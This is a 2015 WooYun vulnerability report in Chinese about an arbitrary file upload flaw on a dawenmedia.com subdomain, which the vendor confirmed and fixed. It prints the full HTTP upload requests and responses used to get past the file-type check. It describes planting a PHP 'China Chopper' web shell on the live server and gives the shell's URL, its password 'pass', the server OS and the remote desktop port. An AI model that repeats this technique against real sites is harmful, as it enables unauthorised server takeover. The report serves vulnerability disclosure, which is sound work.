当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100958

漏洞标题:达闻传媒某分站任意上传可导致服务器沦陷

相关厂商:dawenmedia.com

漏洞作者:

提交时间:2015-03-12 18:00

修复时间:2015-04-26 18:02

公开时间:2015-04-26 18:02

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-12: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-26: 细节向公众公开

简要描述:

*

详细说明:

今天看wooyun发现新来的厂商
就谷歌了一下。
发现一处上传:

http://wx.api.dawenmedia.com/wxdw/register/bride


然后尝试上传
上传截图数据如下:

POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106
------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.jpg"
Content-Type: image/jpeg
test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--


修改下类型为:

POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106
------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.txt"
Content-Type: txt/txt
test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--


尝试上传文本,返回得到:

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 12 Mar 2015 08:40:17 GMT
Content-Length: 123
{"url":"attachment\/2015\/03\/20150312164017480509.txt","url_thumb":"attachment\/2015\/03\/20150312164017480509_thumb.txt"}


构造路径为:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312164017480509.txt


然后修改为PHP得到路径为:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162755649840.php


然后上传PHP菜刀一句话:
得到URL:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162934728860.php


密码pass

aa.png


服务器为2008系统的服务器

bb.png


终端端口是33669
到这里了,就不上提权工具提权了。到此为止吧。

漏洞证明:

修复方案:

*

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-12 20:18

厂商回复:

已处理,危害挺严重的。

最新状态:

暂无